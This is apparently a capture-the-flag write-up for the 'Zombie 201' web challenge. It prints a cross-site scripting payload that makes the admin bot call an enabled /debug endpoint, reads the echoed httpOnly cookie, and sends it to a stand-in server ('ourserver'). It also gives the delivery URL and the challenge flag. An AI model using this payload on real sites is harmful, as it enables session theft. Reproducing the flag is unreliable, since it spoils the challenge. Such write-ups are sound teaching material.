Zombie 201 - Web

Description

Congratulations, you got the admin’s cookie! Can you do it again? It might be a little harder this time. You are well on your way through the gauntlet. You can’t stop now.

The task is the same as previous part “Zombie 101” challenge. All the files are the same, only the configuration is different.

From docker-compose.yml file on line 9 we can see the configuration file changed.

configFile: '{"flag": "wctf{redacted}", "httpOnly": true, "allowDebug": true}'

In the previous part of the challenge httpOnly was set to false, who left us retrieve the admin cookie via js.

We can also see that the allowDebug option is still set to true.

Here the /debug endpoint code :

app.get('/debug', function(req, res) {
    if (config.allowDebug) {
        res.send({"remote-ip": req.socket.remoteAddress, ...req.headers})
    }
    else {
        res.send('sorry, debug endpoint is not enabled')
    }
})

As allowDebug is set to true we might want to use that endpoint in order to leak the admin cookie.

Lets craft our payload, so we want :

  1. admin fetch /debug endpoint
  2. parse result as json
  3. retrieve cookie entry
  4. exfiltrate the cookie

Here the final payload :

//Fetch debug page
fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug").then( 
    function(response) {
        //get result as json
        return response.json(); 
    }
).then(
        function(data) {
            //get cookie entry and exfiltrate
            window.location.href = "http://ourserver/?c=".concat(data['cookie']);
        }
    );

Send it to admin via /visit endpoint and get the flag :+1:

https://zombie-201-tlejfksioa-ul.a.run.app/visit?url=https://zombie-201-tlejfksioa-ul.a.run.app/zombie?show=fetch(“https://zombie-201-tlejfksioa-ul.a.run.app/debug”).then(function(response) {return response.json();}).then(function(data) {window.location.href = “http://ourserver/?c=”.concat(data[‘cookie’]);})

here the flag : wctf{h1dd3n-c00k135-d1d-n07-h31p-373964}